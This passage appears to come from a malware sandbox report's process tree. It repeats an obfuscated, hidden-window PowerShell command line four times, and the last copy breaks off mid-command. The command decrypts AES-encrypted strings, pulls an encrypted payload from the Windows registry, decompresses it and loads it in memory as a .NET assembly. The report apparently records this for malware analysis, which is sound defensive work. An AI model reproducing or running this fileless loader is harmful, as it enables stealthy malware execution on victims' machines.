        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7840).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        35⤵
        
        PID:5104
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7840).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        35⤵
        
        PID:7716
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7840).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        35⤵
        Hide Artifacts: Hidden Window
        
        PID:4512
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4512).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = 